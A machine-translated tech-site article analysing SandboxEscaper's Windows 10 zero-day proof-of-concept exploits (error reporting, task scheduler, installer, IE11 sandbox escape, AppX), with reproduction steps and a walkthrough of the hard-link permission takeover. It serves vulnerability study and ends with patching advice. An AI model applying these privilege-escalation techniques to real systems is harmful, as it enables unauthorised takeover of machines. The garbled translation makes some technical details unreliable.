Shulou(Shulou.com)05/31 Report--

The content of this article mainly focuses on what is the SandboxEscaper disclosure vulnerability POC research report. The content of the article is clear and clear. It is very suitable for beginners to learn and is worth reading. Interested friends can follow the editor to read together. I hope you can get something through this article!

Overview of events

Security researcher SandboxEscaper recently released a demo exploit code for five zero-day vulnerabilities in Windows 10 on GitHubs.

The codes are:

Windows error report

Windows task planning

Windows installer

IE11 sandbox escape

Windows AppX deployment Services

With the exception of one or five zero-day loopholes, the other three have been exposed since 2018.

Vulnerability details Windows error report zero day

1. Utilization conditions:

You can take advantage of carefully placed DACL (discretionary access control list) operations:

When we trigger the report queue task, the WER service attempts to delete two files. It writes a DACL for the two files to ensure that SYSTEM "deletes" them. This way of working is divided into two steps:

a. Call GetFileSecurity and get the security description

b. Add something to the security descriptor, so you have SYSTEM delete permission, and then use SetFileSecurity to write it back to the file

It also closes the file handle between two function calls, which means that if we generate a hard link between two function calls, it will first get the security descriptor from the normal file, which the user can write to.

It will then copy these permissions and use this security descriptor for hard links to completely different files.

A successful run would look like this:

You can see the hard links being created after the QuerySecurityFile and before the SetSecurityFile. You can use IDA to view (wer.dll) and confirm. It is obvious that the function under attack is: UtilAddAccessToPath

two。 Reproduce steps:

a. Copy AngryPolarBearBug.exe and report.wer to the same folder

b. Run AngryPolarBearBug.exe

This vulnerability has a low chance of success because the trigger condition is difficult to control (the trigger error may take 15 minutes, if it takes too long, you need to close the program and clean up the cached data folder), and it was fixed earlier.

Windows mission planning zero day

1. Utilization condition

Windows10 has two tasks folders:

A. C:\ Windows\ tasks

B. C:\ Windows\ SYSTEM32\ tasks

The first is to retain use due to problems left over from history. The second is used by the win10 task scheduler. In the past (that is, windows xp), the task ".job" file format would be placed in "c:\ windows\ tasks".

If you want to import a .job file into the task scheduler on Windows 10, you must first copy the old ".job" file to "c:\ windows\ tasks" and run the following command using the schtasks.exe and schedsvc.dll copied from the old system:

Schtasks / change / TN "taskname" / RU username / RP password "

This results in a call to RPC "_ SchRpcRegisterTask", which is exposed by the task scheduler service. To trigger this error, you can call this function directly instead of having to copy schtasks.exe from windows xp.

It first runs under the current user privileges, but when it encounters the following features:

Int _ _ stdcalltsched:: SetJobFileSecurityByName (LPCWSTRStringSecurityDescriptor,const unsigned _ _ int16 *, int,const unsigned _ int16 *)

It starts running under NT AUTHORITY\ SYSTEM permissions

Then call SetSecurityInfo on the task created in c:\ windows\ system32\ tasks:

two。 Reproduction step

a. Copy polarbear.exe,bear.job,schtasks.exe,schtasks.dll from the "poc files" folder to the test VM

b. Run polarbear.exe to pass the user name and password of the local non-administrator account.

To trigger this vulnerability, you first need to have the correct user name and password. However, this is not difficult, and there are many hacker tools that can do it.

Windows installer zero day

1. Utilization condition

When repairing and installing the Windows program, there will be a short time interval (race condition) if the process can be hijacked to write files to unauthorized areas of the Windows operating system.

This vulnerability in the msiexec / fa (repair installation) operation can be used to plant malware and take over computers that hackers initially had access to only low-privilege accounts.

two。 Reproduction step

a. Run polarbear.exe (make sure test.rbf and test.rbs are in the same directory)

b. Open the command line to install the .MSI installer must be in the c:\ windows\ insatller directory, for example, the command: "msiexec/fa c:\ windows\ installer\ 123123213.msi"

There is also an element of luck in the recurrence of this vulnerability, which needs to be triggered by the right competitive conditions during installation, while quickly clicking the back button.

IE11 sandboxie escapes from zero day

1. Utilization condition

The whole execution process is relatively simple. You need to write the target.link to the "% USERPROFILE%\ Favorites" directory of windows before hard-coding "alert ('wtf');" through communication with ie through the com component.

two。 Reproduction step

A. InjectDll.exe PID TestDll.dll

The key to this vulnerability is to successfully obtain the IE11 process handle and successfully inject the target module in order to execute malicious code. Obviously, this zero day cannot be used remotely and should be regarded as a problem with less impact.

Windows AppX deployment Services Zero Day

1. Utilization condition

This is an error in the way Windows AppX deployment Services (AppXSVC) incorrectly handles hard links. From CVE-2019-0841

Exploiting the vulnerability first checks whether the target file exists, and if so, it checks its permissions. Because we are using Microsoft Edge for this attack, it will terminate the Microsoft Edge to access the settings.dat file.

After Microsoft Edge is killed, it examines the "setting.dat" file and deletes it to create a hard link to the requested target file. Once the hard link is created, Microsoft Edge starts again to trigger the vulnerability. Finally, check to see if the full Control permission is indeed set for the current user.

Microsoft pushed a patch fix in April, but it can still be used.

two。 Reproduction step

a. Run polarbear.exe

b. Run windowsappslpe.exe

This vulnerability bypasses the CVE-2019-0841 patch fixed by Microsoft. Attack by EXP before creating a hard link in advance and then performing a vulnerability patch.

Windows AppX loophole recurrence and detailed principle Analysis

We now run the executable file polarbear.exe directly and analyze how it works:

a. The purpose is to create the specified subdirectory\\ Packages\\ Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\ Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe in the system data directory "% LOCALAPPDATA%"

For use by attacks.

Successful execution:

b. Use NtOpenFile to open a file with object properties for OBJ_CASE_INSENSITIVE

c. Setting file properties using ZwSetInformationFile requires setting the FILE_LINK_INFORMATION structure ReplaceIfExists field to TRUE and passing the FILE_INFORMATION_CLASS value to FileLinkInformation

d. Finally, the encapsulated function CreateNativeHardlink is called, and the hard link file L "\ Packages\\ Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\ Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe\\ bear3.txt" that needs to be created is passed.

The file "C:\\ Windows\\ win.ini" that needs to modify permissions

At this point, we can see that the hard link has been created successfully:

At this point, the entire environment for bypassing patches has been built. But we still need to use CVE-2019-0841 to achieve the attack effect of local power enhancement.

This vulnerability revolves around events raised by DCAL. To put it simply, if the Windows object does not have an autonomous access control list (DACL), the system allows everyone full access to it. If the object has a DACL, the system only allows access that is explicitly allowed by the access control entry (ACE) in the DACL.

Let's focus on "settings.dat", which is Microsoft Edge's file and one that plays a key role in this exploit process. All WindowsApps user profiles are stored in the current user's AppData folder:

Windows 10 has installed a number of default applications, and each package has a settings.dat file, as mentioned earlier.

NT AUTHORITY\ SYSTEM uses this file to write any configuration changes. After starting the Windows application, the system uses the OpLock operation (exclusive locking) to prevent other processes from using / accessing the file while the application is running.

When we start Microsoft Edge, the settings.dat file is opened by the process as NT AUTHORITY\ SYSTEM, which can be seen in the screenshot below:

When turned on, some basic integrity checks are performed as follows:

a. Check the file permissions and correct them with the correct file permissions if the file permissions are incorrect

b. Read the contents of the file and delete the file if the content is corrupted

c. Reconfigure by copying the settings template file from "C\ Windows\ System32\ settings.dat"

d. Continue to start Windows-related applications

So the program that executes POC will do at least three things:

(1) to exploit the vulnerability, first check whether the target file exists, and if so, it will check its permissions. Because we are using Microsoft Edge for this attack, it will terminate the Microsoft Edge to access the settings.dat file.

(2) after Microsoft Edge is killed, it will check and delete the "setting.dat" file in order to create a hard link (win.ini) to the requested target file.

(3) once a hard link is created, Microsoft Edge starts again to trigger the vulnerability. Finally, check to see if the full Control permission is indeed set for the current user.

The following is a schematic diagram of the implementation results:

Before execution:

After execution:

Summary of vulnerabilities and security recommendations

As we can see from the above analysis, the following are the most basic prerequisites for triggering a vulnerability:

NT AUTHORITY\ SYSTEM should have "full control" of the target file

Low-privileged users or Users groups should have read / execute permissions

Security recommendations:

Download and update Windows system patches to fix vulnerabilities

Do not run programs of unknown origin at will

Install well-known antivirus software and keep up-to-date

Thank you for your reading. I believe you have a certain understanding of "what is the SandboxEscaper Disclosure vulnerability POC Research report". Go ahead and practice it. If you want to know more about it, you can follow the website! The editor will continue to bring you better articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.